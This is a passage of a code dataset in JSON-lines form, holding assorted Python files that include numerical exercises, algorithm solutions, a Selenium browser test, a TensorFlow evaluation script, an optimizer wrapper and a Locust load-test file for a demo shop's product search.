(1/4)*y**2 + 3)*cos(2*x + 1 - exp(y))'\n# Establecer que es una expresion con variable simbolica\nf_3 = sp.S(f_3)\n# Graficar la funcion para explorar dominio\nplot3d(f_3, (x, -4, +4), (y, -4, +4))\n# Evaluar funcion de gradiente descendente\nf_grad(param_fun=f_3, param_x=-1, param_y=-4, param_e=10e-3, param_p=4)\n\n# -- Notas de ejercicio 3\n# grafique de x=-4 a x=4, y=-4 a y=4 y note que la funcion es bastante \"complicada\"\n# deje valores de x=-1 a y=-4, que elegi visualmente como una \"cima\" o valor maximo\n# y la funcion convergio bastante rapido a un minimo local\n","sub_path":"Tarea_4_Gradiente_Descendente/IDI_II_Tarea4_JFME.py","file_name":"IDI_II_Tarea4_JFME.py","file_ext":"py","file_size_in_byte":4024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} 
+{"seq_id":"147453149","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nhf = 8.75*10**-20\nkB = 1.381*10**-23\neps = 1.218*10**-21\nTmin = 20\nTmax = 2000\nnsteps = 198000\n\n\nT = np.linspace(Tmin,Tmax,nsteps)\n\nj = np.arange(1,88,2)\n\n\nx = kB*T/eps\nZ_para = np.ones(len(x))\nU_para = np.zeros(nsteps)\n\ndx = x[100]-x[99]\n\nfor k in range(0,nsteps):\n Z_para[k] = np.sum((2*j+1)*np.exp(-j*(j+1)/x[k]))\n U_para[k] = np.sum(j*(j+1)*(2*j+1)*np.exp(-j*(j+1)/x[k])/Z_para[k])\n\nCv_para = np.diff(U_para)/dx\n\nj = np.arange(0,88,2)\nZ_orth = np.ones(len(x))\nU_orth = np.zeros(nsteps)\n\nfor k in range(0,nsteps):\n Z_orth[k] = np.sum((2*j+1)*np.exp(-j*(j+1)/x[k]))\n U_orth[k] = np.sum(j*(j+1)*(2*j+1)*np.exp(-j*(j+1)/x[k])/Z_orth[k])\n\nCv_orth = np.diff(U_orth)/dx\n\n\nCv_rot = 3*Cv_orth/4+Cv_para/4\n\nCv_tr = 3/2\n\nCv_vib = (hf/(kB*T))**2/(2*np.sinh(hf/(kB*T))-2)\n\n\nplt.figure()\nplt.plot(x,Z_para,'r')\nplt.plot(x,Z_orth,'b')\nplt.xlabel('kT/eps')\nplt.ylabel('Partition function')\nplt.show()\n\nplt.figure()\nplt.plot(x,U_para)\nplt.plot(x,U_orth)\nplt.xlabel('kT/eps')\nplt.ylabel('U')\nplt.show()\n\nx = np.delete(x,0)\nT = np.delete(T,0)\n\nplt.figure()\nplt.plot(T,Cv_para)\nplt.plot(T,Cv_orth)\nplt.xlabel('kT/eps')\nplt.ylabel('Cv/Nk')\nplt.show()\n\nCv_vib = np.delete(Cv_vib,0)\n\nplt.figure()\nplt.plot(T,Cv_vib+Cv_tr+Cv_rot)\nplt.ylim(0,3)\nplt.xscale('log')\nplt.xlabel('T (K)')\nplt.ylabel('Cv/Nk')\nplt.show()\n","sub_path":"opdracht.py","file_name":"opdracht.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"250626447","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.select import Select\nfrom functions.handyWrappers import HandyWrappers\nfrom datetime import datetime\nimport time\nimport random\nfrom functions.explicit_wait import ExplicitWaitType\n\n\nclass TestCase1():\n def testSuite(self):\n driver = webdriver.Chrome(executable_path=\"C:\\Selenium\\chromedriver.exe\")\n URL = \"https://www.expedia.com/\"\n driver.maximize_window()\n driver.implicitly_wait(10)\n driver.get(URL)\n wait = ExplicitWaitType(driver)\n hw = HandyWrappers(driver)\n ## generic method to select dates from calendar\n\n destinationForScreenshots = \"C:\\\\Users\\S4etovodov\\Desktop\\Selenium_screenshots\\\\\"\n\n flightsBtn = hw.getElement(\"tab-flight-tab-hp\")\n flightsBtn.click()\n\n advancedOptions = hw.getElement(\"flight-advanced-options-hp-flight\")\n advancedOptions.click()\n\n time.sleep(2)\n\n nonstopCheckBox = hw.getElement(\"advanced-flight-nonstop-hp-flight\")\n nonstopCheckBox.click()\n\n time.sleep(2)\n\n preferredAirlineDrDwn = hw.getElement(\"flight-advanced-preferred-airline-hp-flight\")\n sel = Select(preferredAirlineDrDwn)\n sel.select_by_value(\"SU\")\n\n time.sleep(2)\n\n classDrpDwn = hw.getElement(\"flight-advanced-preferred-class-hp-flight\")\n sel1 = Select(classDrpDwn)\n sel1.select_by_value(\"business\")\n\n OriginField = hw.getElement(\"flight-origin-hp-flight\")\n OriginField.send_keys(\"new\")\n time.sleep(2)\n OriginItem = hw.getElement(\"// ul[ @ id = 'typeaheadDataPlain'] // li/a[contains(@data-value,'New York (NYC-All Airports)')]\", \"xpath\")\n OriginItemText = OriginItem.text\n print(OriginItemText)\n OriginItem.click()\n time.sleep(2)\n\n flyingToField = hw.getElement(\"flight-destination-hp-flight\")\n flyingToField.send_keys(\"mos\")\n time.sleep(2)\n flyingToFieldItem = 
hw.getElement(\"//ul[@id='typeaheadDataPlain']//li/a[contains(@data-value, 'Moscow, Russia (MOW-All Airports)')]\",\"xpath\")\n flyingToFieldItem.click()\n\n time.sleep(2)\n\n oneWayBtn = hw.getElement(\"flight-type-one-way-label-hp-flight\")\n oneWayBtn.click()\n\n time.sleep(2)\n departingField = hw.getElement(\"//input[@id='flight-departing-single-hp-flight']\", \"xpath\")\n departingField.click()\n\n\n monthsSel = {\n \"january\": '0',\n \"february\": '1',\n \"september\": '8'\n }\n\n\n depDateMonth = \"september\"\n depDateDay = \"18\"\n depDateYear = \"2018\"\n\n print(monthsSel[depDateMonth])\n\n depDXpath = \"//div[@id='flight-departing-wrapper-single-hp-flight']//button[contains(@data-year, '{0}') and contains(@data-month, '{1}') and contains(@data-day, '{2}')]\"\n depDateXpath = depDXpath.format(depDateYear, monthsSel[depDateMonth], depDateDay)\n print(depDateXpath)\n departureDate = hw.getElement(depDateXpath, \"xpath\")\n departureDate.click()\n #//div[ @ id = 'flight-departing-wrapper-single-hp-flight'] // button[contains( @ data - year, '2018') and contains( @ data - month, '8') and contains( @ data - day, '18')]\n #driver.find_element(By.XPATH, \"//div[@id='flight-departing-wrapper-single-hp-flight']//button[contains (@data-year, '2018') and contains (@data-month, '8') and contains (@data-day, '18')]\").click()\n #el = wait.waitForElement(\"//div[@id='flight-departing-wrapper-single-hp-flight']//button[contains(@data-year,'2018') and contains( @data-month, '8') and contains(@data-day, '18')]\", \"xpath\", 25).click()\n\n hw.takeScrShot(destinationForScreenshots)\n\n\n element = wait.waitForElement(\"//form[@id='gcw-flights-form-hp-flight']/div[8]/label/button\", \"xpath\", 10)\n element.click()\n time.sleep(2)\n\n hw.takeScrShot(destinationForScreenshots)\n\n driver.quit()\n\nTestExecution1 = TestCase1()\nTestExecution1.testSuite()\n\n","sub_path":"Testing3(expedia.com).py","file_name":"Testing3(expedia.com).py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"265506228","text":"# Q 11 Assignment\nimport math\n\nC = 50\nH = 30\nd = input(\"enter comma separated decimal input\")\nlist1 = d.split(',')\nlength = len(list1)\nprint(d)\nprint(list1)\nprint(length)\n\nfor i in list1:\n print(i)\n D = int(i)\n Q = math.sqrt((2 * C * D)/H)\n \n print(\"Q = \", int(Q))\n","sub_path":"pycode/original1.Question11CSVinput.py","file_name":"original1.Question11CSVinput.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"311127409","text":"# Input\n# [\"LRUCache\", \"put\", \"put\", \"get\", \"put\", \"get\", \"put\", \"get\", \"get\", \"get\"]\n# [[2], [1, 1], [2, 2], [1], [3, 3], [2], [4, 4], [1], [3], [4]]\n# Output\n# [null, null, null, 1, null, -1, null, -1, 3, 4]\n\n# Explanation\n# LRUCache lRUCache = new LRUCache(2);\n# lRUCache.put(1, 1); // cache is {1=1}\n# lRUCache.put(2, 2); // cache is {1=1, 2=2}\n# lRUCache.get(1); // return 1\n# lRUCache.put(3, 3); // LRU key was 2, evicts key 2, cache is {1=1, 3=3}\n# lRUCache.get(2); // returns -1 (not found)\n# lRUCache.put(4, 4); // LRU key was 1, evicts key 1, cache is {4=4, 3=3}\n# lRUCache.get(1); // return -1 (not found)\n# lRUCache.get(3); // return 3\n# lRUCache.get(4); // return 4\n\nclass Node:\n def __init__(self, key,val):\n self.key,self.val = key,val\n self.prev = self.next = None\n\nclass LRUCache:\n\n def __init__(self, capacity: 
int):\n self.cap = capacity\n self.cache = {}\n self.left, self.right = Node(0,0), Node(0,0)\n self.left.next, self.right.prev = self.right, self.left \n\n def get(self, key: int) -> int:\n if key in self.cache:\n self.remove(self.cache[key])\n self.insert(self.cache[key])\n return self.cache[key].val\n else:\n return -1\n \n def remove(self,node):\n prev, nex = node.prev, node.next\n prev.next, nex.prev = nex, prev\n \n def insert(self,node):\n prev,nex = self.right.prev, self.right\n prev.next = nex.prev = node\n node.next,node.prev = nex,prev \n \n def put(self, key: int, value: int) -> None:\n if key in self.cache:\n self.remove(self.cache[key])\n self.cache[key] = Node(key,value)\n self.insert(self.cache[key])\n \n if len(self.cache) > self.cap:\n lru = self.left.next\n self.remove(lru)\n del self.cache[lru.key]\n \n \n\n\n# Your LRUCache object will be instantiated and called as such:\n# obj = LRUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)","sub_path":"team_work/Vincent/linkList/medium/LRU Cache/Q146.py","file_name":"Q146.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"298232270","text":"__author__ = 'Joe Linn'\n\nimport pylastica.aggregation.abstractaggregation as abstract\nimport pylastica.filter.abstractfilter as abstractfilter\n\n\nclass Filter(abstract.AbstractAggregation):\n def set_filter(self, filter):\n \"\"\"\n Set the filter for this aggregation\n @param filter: the filter to use for this aggregation\n @type filter: pylastica.filter.abstractfilter.AbstractFilter\n @return:\n @rtype: Filter\n \"\"\"\n if not isinstance(filter, abstractfilter.AbstractFilter):\n raise TypeError(\"filter must be an instance of an implementation of AbstractFilter: %r\" % filter)\n return self.set_param(\"filter\", filter.to_dict())\n\n def to_dict(self):\n \"\"\"\n\n @return:\n @rtype: dict\n \"\"\"\n return {\n \"filter\": self.get_param(\"filter\"),\n \"aggs\": self._aggs\n }","sub_path":"pylastica/aggregation/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"49308241","text":"import random\n#Decide what type of game you will be playing. For now there is just Gladiator\nwhile True:\n try:\n GameType = input(\"What type of game do you want to play? For now there is only Gladiator.\\n>\").lower().split()\n except ValueError:\n print(\"Sorry, I didn't understand that!\")\n continue\n if GameType[0] == \"gladiator\":\n from Gladiator import GladiatorMain\n\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"337571226","text":"#! 
/usr/bin/env python\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nfrom tensorflow.contrib import learn\n\n\ndef batch_data(layer1, layer2, batch_size=64):\n data_size = len(layer1)\n num_batches_per_epoch = int((data_size-1)/batch_size) + 1\n \n for batch_num in range(num_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n \n batch_layer1_data = layer1[start_index:end_index]\n batch_layer2_data = layer2[start_index:end_index]\n \n yield zip(batch_layer1_data, batch_layer2_data)\n \n \ndef predict(layer1, layer2):\n \n # Map data into vocabulary\n vocab_path = os.path.join(os.path.curdir, \"mlmodels\", \"vocab\")\n vocab_processor = learn.preprocessing.VocabularyProcessor.restore(vocab_path)\n x_layer1 = np.array(list(vocab_processor.transform(layer1)))\n x_layer2 = np.array(list(vocab_processor.transform(layer2)))\n \n # 3D arrays\n x_test = np.dstack([x_layer1, x_layer2])\n x_test = x_test.reshape((x_test.shape[0], x_test.shape[2], x_test.shape[1]))\n \n # Read in the model form the latest checkpoint. There are a lot of \n # components to load in separately. \n checkpoint_path = os.path.join(os.path.curdir, \"mlmodels\", \"checkpoints\")\n checkpoint_file = tf.train.latest_checkpoint(checkpoint_path)\n graph = tf.Graph()\n with graph.as_default():\n session_conf = tf.ConfigProto(\n allow_soft_placement=True,\n log_device_placement=False)\n sess = tf.Session(config=session_conf)\n with sess.as_default():\n # Load the saved meta graph and restore variables\n saver = tf.train.import_meta_graph(\"{}.meta\".format(checkpoint_file))\n saver.restore(sess, checkpoint_file)\n \n # Get the placeholders from the graph by name\n input_x = graph.get_operation_by_name(\"input_x\").outputs[0]\n \n # If dropout was used to regularize, get that information.\n dropout_keep_prob = graph.get_operation_by_name(\"dropout_keep_prob\").outputs[0]\n \n # Tensors we want to evaluate\n predictions = graph.get_operation_by_name(\"output/predictions\").outputs[0]\n \n all_predictions = sess.run(predictions, {input_x: x_test, dropout_keep_prob: 1.0})\n \n return all_predictions\n","sub_path":"cnn_text_classification_tf/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"359343954","text":"#!/usr/bin/python\n\nimport fnmatch\nimport os\n\ndef createNewFile(filename_prog):\n\tnewFile = open(filename_prog[0:-4] + \"py\", \"w\");\n\toriginalFile = open(filename_prog, \"r\")\n\tnewText = \"\"\n\n\tfor line in originalFile:\n\t\tif \"import\" in line:\n\t\t\tnewText += line\n\t\telif line[0:6] == \"CIKLUS\":\n\t\t\tnewText += swapLoop(line)\n\t\telif line[0:8] == \"ELAGAZAS\":\n\t\t\tnewText += swap(line, \"ELAGAZAS\")\n\t\telse:\n\t\t\tnewText += swapSequence(line)\n\n\tnewFile.write(newText[:-1])\n\ndef swap(line, swapstr, inner = False):\n\tsplittedLine = line.split(\"[\");\n\n\tif swapstr == \"CIKLUS\":\n\t\treturnLine = splittedLine[0].rstrip().replace(swapstr, \"for\") + \" :\"\n\telse:\n\t\treturnLine = splittedLine[0].rstrip().replace(swapstr, \"if\") + \" :\"\n\n\trows = swapSequence(splittedLine[2].rstrip()[0:-2]).split(\"\\n\")\n\n\tfor i in rows:\n\t\tif(inner):\n\t\t\treturnLine += \"\\n \" + i\n\t\telse:\n\t\t\treturnLine += \"\\n \" + i\n\n\treturn returnLine[:-4]\n\ndef swapLoop(line):\n\treturnLine = \"\"\n\n\tsplittedLine = line.split(\";\");\n\n\tinnerSplit = splittedLine[0].split(\"[\")\n\treturnLine = 
innerSplit[0].rstrip().replace(\"CIKLUS\", \"for\") + \" :\"\n\t\n\tif innerSplit[2].startswith(\"CIKLUS\"):\n\t\treturnLine += \"\\n    \" + swap(innerSplit[2], \"CIKLUS\").rstrip()\n\telse:\n\t\treturnLine += \"\\n    \" + innerSplit[2].rstrip()\n\n\tfor i in range(1, len(splittedLine)):\n\t\tif splittedLine[i].startswith(\"CIKLUS\"):\n\t\t\tif i == len(splittedLine) - 1:\n\t\t\t\treturnLine += \"\\n    \" + swap(splittedLine[i].rstrip()[:-2], \"CIKLUS\", True).rstrip()\n\t\t\telse:\n\t\t\t\treturnLine += \"\\n    \" + swap(splittedLine[i], \"CIKLUS\", True).rstrip()\n\t\telse:\n\t\t\tif i == len(splittedLine) - 1:\n\t\t\t\treturnLine += \"\\n    \" + splittedLine[i].rstrip()[:-2]\n\t\t\telse:\n\t\t\t\treturnLine += \"\\n    \" + splittedLine[i]\n\n\treturnLine += \"\\n\"\n\treturn returnLine\n\ndef swapSequence(line):\n\tsplittedLine = line.split(\";\")\n\treturnLine = \"\"\n\n\tfor i in splittedLine:\n\t\treturnLine += i.rstrip() + \"\\n\"\n\n\treturn returnLine\n\nfor file in os.listdir('.'):\n    if fnmatch.fnmatch(file, '*.prog'):\n        createNewFile(file)","sub_path":"Part_II./main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"349862933","text":"import collections\n\nn, m = map(int, input().split())\nw = list(map(int, input().split()))\n# memo[v]: set of (edge index, other endpoint) pairs incident to vertex v\nmemo = [set() for _ in range(n)]\nfor i in range(1, m + 1):\n    x, y = map(int, input().split())\n    memo[x-1].add((i, y - 1))\n    memo[y-1].add((i, x - 1))\n    w[x-1] -= 1\n    w[y-1] -= 1\n\nque = collections.deque()\nfor i in range(n):\n    if w[i] >= 0:\n        que.append(i)\n\nres = collections.deque()\nexist = [False] * (m + 1)\nwhile que and len(res) < m:\n    x = que.popleft()\n    for i, o in memo[x]:\n        if not exist[i]:\n            res.append(i)\n            exist[i] = True\n            w[o] += 1\n            if w[o] == 0:\n                que.append(o)\nif len(res) != m:\n    print('DEAD')\nelse:\n    print('ALIVE')\n    for i in reversed(res):\n        print(i, end=' ')\n    print()\n","sub_path":"Codeforces Round #652 (Div. 
2)/.history/E_DeadLee_20200703105634.py","file_name":"E_DeadLee_20200703105634.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"304125719","text":"def possible_plan(n,r,w):\n global cnt\n global visited\n\n if n == r:\n cnt += 1\n else:\n for i in range(N):\n if visited[i] == 0 and w + kits[i] - K >= 500:\n visited[i] = 1\n possible_plan(n,r+1, w+kits[i] - K)\n visited[i] = 0\n\nN, K = map(int, input().split())\nkits = list(map(int, input().split()))\nvisited = [0 for _ in range(N)]\ncnt = 0\n\npossible_plan(N,0,500)\nprint(cnt)","sub_path":"baekjun/근손실.py","file_name":"근손실.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"418939870","text":"from sklearn.naive_bayes import GaussianNB\nfrom mining.preprocessing import *\n\nclass Classify:\n #Data should be acquired from file_path[0] in main_content begin(push button) event handle\n def __init__(self, data):\n\n #training data\n self.training = Preprocessing_Train()\n\n self.training_data = self.training.display_Training()\n self.training_class = self.training.display_Class()\n\n #Data to predict\n self.data = data\n self.new_data = Preprocessing_Data(self.data)\n self.new_data_display = self.new_data.display()\n\n #classification training and prediction\n self.classifier = GaussianNB()\n self.classifier.fit(self.training_data, self.training_class)\n self.predict = self.classifier.predict(self.new_data_display)\n #print('training_data: \\n', self.training_data.shape)\n #print('training_class: \\n', self.training_class.shape)\n #print('new_data_display \\n', self.new_data_display.shape)\n\n def raw_display(self):\n return self.predict\n\n def display_table(self):\n self.table_data = DataFrame(read_excel(self.data, header = 0))\n\n #display NOMBRE | APELLIDO | CORREO\n self.table_data_column_removed = self.table_data.drop(self.table_data.columns[[0, 1, 2, 3, 4, 5, 8, 9, 10, 12, 13, 14, 15, 16]], axis = 1)\n #self.table_data_row_removed = self.table_data_column_removed.drop(self.table_data_column_removed.index[[0]])\n #self.table_data_removed = self.table_data_row_removed\n self.table_data_removed = self.table_data_column_removed\n\n #add column name to predicted data\n self.predicted_data = DataFrame(self.predict)\n self.predicted_data.columns = [\"CLASS\"]\n\n #connected the predicted results with the data we want to display\n\n self.output_data = concat([self.table_data_removed, self.predicted_data], axis = 1)\n return array(self.output_data)\n\n\n def full_display(self):\n self.full_data = DataFrame(read_excel(self.data, header = 0))\n self.predicted_data = DataFrame(self.predict)\n self.predicted_data.columns = [\"CLASS\"]\n self.output_data = concat([self.full_data, self.predicted_data], axis=1)\n return self.output_data\n\n\n\n#cls = Classify('/Users/rtassara2006/Dropbox/QUINTO2016/TALLER DE INGENIERIA DE SOFTWARE/TEST.xlsx')\n#print('raw data: \\n', cls.raw_display())\n#print('display table \\n', cls.display_table())\n#print(cls.full_display())","sub_path":"mining/algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"263745680","text":"\"\"\"\nModule which acts as a analytic Jacobian calculator\n\"\"\"\nfrom fitbenchmarking.jacobian.base_jacobian import Jacobian\nfrom fitbenchmarking.utils.exceptions import 
NoJacobianError\n\nfrom numpy import matmul\n\n\n# pylint: disable=useless-super-delegation\nclass Analytic(Jacobian):\n    \"\"\"\n    Class to apply an analytical Jacobian\n    \"\"\"\n\n    def __init__(self, cost_func):\n        super(Analytic, self).__init__(cost_func)\n        if not callable(self.problem.jacobian):\n            raise NoJacobianError(\"Problem set selected does not currently \"\n                                  \"support analytic Jacobians\")\n\n    def eval(self, params, **kwargs):\n        \"\"\"\n        Evaluates Jacobian of problem.eval_model\n\n        :param params: The parameter values to find the Jacobian at\n        :type params: list\n\n        :return: Approximation of the Jacobian\n        :rtype: numpy array\n        \"\"\"\n        x = kwargs.get(\"x\", self.problem.data_x)\n        e = kwargs.get(\"e\", self.problem.data_e)\n        jac = self.problem.jacobian(x, params)\n        if self.problem.options.cost_func_type == \"weighted_nlls\":\n            # scales each column of the Jacobian by the weights\n            jac = jac / e[:, None]\n        elif self.problem.options.cost_func_type == \"root_nlls\":\n            # calculates the Jacobian of the root NLLS cost function\n            jac = jac * self.problem.eval_model(params, x=x)[:, None] / 2\n        return jac\n\n    def eval_cost(self, params, **kwargs):\n        \"\"\"\n        Evaluates derivative of the cost function\n\n        :param params: The parameter values to find the Jacobian at\n        :type params: list\n\n        :return: Computed derivative of the cost function\n        :rtype: numpy array\n        \"\"\"\n        rx = self.cached_func_values(self.cost_func.cache_rx,\n                                     self.cost_func.eval_r,\n                                     params,\n                                     **kwargs)\n        J = self.eval(params, **kwargs)\n        out = 2.0 * matmul(J.T, rx)\n        return out\n","sub_path":"fitbenchmarking/jacobian/analytic_jacobian.py","file_name":"analytic_jacobian.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"576911107","text":"\"\"\"\nSplit-Nim game\nGiven n piles of stones, two players move alternately; in one move a player removes a pile\nand replaces it with two smaller piles (a new pile may have size 0, and the two new piles\ntogether may even hold more stones than the removed pile). The player who cannot move loses.\n\nIf both players play optimally, determine whether the first player wins.\n\nInput format\nThe first line contains the integer n.\n\nThe second line contains n integers, where the i-th integer is the size ai of the i-th pile.\n\nOutput format\nIf the first player is sure to win, print Yes.\n\nOtherwise, print No.\n\nConstraints\n1 ≤ n, ai ≤ 100\nSample input:\n2\n2 3\nSample output:\nYes\n================================================================\nCompared with set-Nim, here every pile may be turned into two piles no larger than the original,\ni.e. a[i] can be split into (b[i], b[j]).\nTo avoid duplicates require b[i] >= b[j], i.e. a[i] >= b[i] >= b[j];\nso one position splits into two positions, and by SG (Sprague-Grundy) theory the SG value of\nseveral independent positions equals the XOR of their individual SG values.\nHence the state to store is sg(b[i]) ^ sg(b[j]) (the only difference from set-Nim).\n\"\"\"\nN, M = 100 + 10, 10000 + 10\n# F caches the SG value of every position seen so far; initialise F to -1\n# so it is easy to check whether SG(x) has already been recorded\nF = [-1] * M\n\n\ndef SG(x):\n    # The set of reachable moves is fixed, so under the recursion the SG value\n    # of every number is fixed as well; if F[x] is already stored, return it directly\n    if F[x] != -1:\n        return F[x]\n    S = set()  # S stores the SG values of the reachable positions\n\n    for i in range(x):\n        j = 0\n        while j <= i:  # require j <= i to avoid duplicates\n            # one position splits into two independent positions; by SG theory their\n            # combined SG value is the XOR of the two SG values\n            S.add(SG(i) ^ SG(j))\n            j += 1\n\n    i = 0\n    while True:  # after the loop, pick the smallest natural number missing from S (the mex)\n        if i not in S:\n            F[x] = i  # record the value in F[x]\n            return i\n        i += 1\n\n\nif __name__ == '__main__':\n    n = int(input())\n    A = list(map(int, input().split()))\n\n    res = 0\n    for i in range(n):\n        res ^= SG(A[i])  # XOR the SG values of all piles, same principle as plain Nim\n\n    print('Yes' if res >= 1 else 'No')  # res != 0\n","sub_path":"2021/Algorithm/Python/Base/4_math_knowledge/894.py","file_name":"894.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"386571076","text":"from qcommunity.optimization.obj import get_obj_val, get_obj\nfrom scipy.optimize import minimize\nimport numpy as np\nimport nlopt\n\n\ndef optimize_obj(obj_val, 
num_parameters, params=None):\n options = {}\n try:\n init_points = params['sample_points'][0]\n except (KeyError, TypeError):\n init_points = np.random.uniform(-np.pi, np.pi, num_parameters)\n try:\n options['maxiter'] = params['n_iter'] + params['init_points']\n except (KeyError, TypeError):\n options['maxiter'] = 100\n\n def objective(x, grad):\n f = obj_val(x)\n return f\n\n nlopt.srand(params['seed'])\n opt = nlopt.opt(nlopt.LN_PRAXIS, num_parameters)\n opt.set_min_objective(objective)\n opt.set_maxeval(options['maxiter'])\n \n if params['ansatz'] == 'QAOA':\n lb = np.array([0, 0] * params['ansatz_depth'])\n ub = np.array([np.pi, 2*np.pi] * params['ansatz_depth'])\n elif params['ansatz'] == 'RYRZ':\n lb = np.array([-np.pi] * num_parameters)\n ub = np.array([np.pi] * num_parameters)\n\n #dist_to_bound = min(min(ub-init_points),min(init_points-lb))\n #opt.set_initial_step(dist_to_bound)\n opt.set_ftol_rel(params['ftol_rel']) \n opt.set_xtol_rel(params['xtol_rel'])\n\n opt.set_lower_bounds(lb)\n opt.set_upper_bounds(ub)\n x = opt.optimize(init_points)\n return x\n","sub_path":"qcommunity/optimization/praxis_nlopt.py","file_name":"praxis_nlopt.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"529538465","text":"#!/usr/bin/python\n#\n# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport random\nimport uuid\nimport logging\nimport os\nfrom locust import HttpLocust, TaskSet\nfrom locust.events import request_failure\nfrom binascii import hexlify\n\nprefixes = [\n 'goo',\n 'mic',\n 'app',\n 'fgssg',\n 'int',\n 'mo',\n 'ewer',\n 'am',\n 'ma',\n 'ip',\n 'sdf']\n\nUSER_AGENTS = [\n \"Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19 (LocustIO)\",\n \"Android 4.0.3;AppleWebKit/534.30;Build/IML74K;GT-I9220 Build/IML74K (LocustIO)\",\n \"KWC-S4000/ UP.Browser/7.2.6.1.794 (GUI) MMP/2.0 (LocustIO)\",\n \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) (LocustIO)\",\n \"Googlebot-Image/1.0 (LocustIO)\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0 (LocustIO)\",\n \"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 (LocustIO)\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36\",\n]\n\n\nclass B3Header:\n def generateHeader(self, identifier_length):\n bit_length = identifier_length * 4\n byte_length = int(bit_length / 8)\n identifier = os.urandom(byte_length)\n return hexlify(identifier).decode('ascii')\n\n\nb3 = B3Header()\n\n\ndef on_failure(request_type, name, response_time, exception, **kwargs):\n logging.error(exception.request)\n logging.error(exception.response)\n\n\nrequest_failure += on_failure\n\n\ndef findProduct(l):\n h = {\n \"User-Agent\": random.choice(USER_AGENTS),\n \"x-client-trace-id\": 
str(uuid.uuid4()),\n \"x-b3-sampled\": \"1\",\n \"x-b3-flags\": \"1\",\t\n \"x-b3-traceid\": b3.generateHeader(32),\n \"x-b3-spanid\": b3.generateHeader(16)\n }\n logging.info(h)\n l.client.get(\"/api/fetchProducts?name=\" +\n random.choice(prefixes), headers=h)\n\n\nclass UserBehavior(TaskSet):\n tasks = {findProduct: 1}\n\n\nclass WebsiteUser(HttpLocust):\n\n task_set = UserBehavior\n min_wait = 1000\n max_wait = 10000\n","sub_path":"pre-grpc/src/loadgenerator/locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"3516507","text":"# Copyright 2017 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Static definitions, such as constants.\"\"\"\n\nimport cProfile\nimport functools\nimport logging\nimport math\nimport typing\nimport injector\nimport numpy\nfrom simulation.configuration import Configuration\n\nT = typing.TypeVar('T')\n\nDAYS = {\n 'Sunday': 0,\n 'Monday': 1,\n 'Tuesday': 2,\n 'Wednesday': 3,\n 'Thursday': 4,\n 'Friday': 5,\n 'Saturday': 6,\n}\n\n# All this functions convert to seconds.\nHOUR = lambda 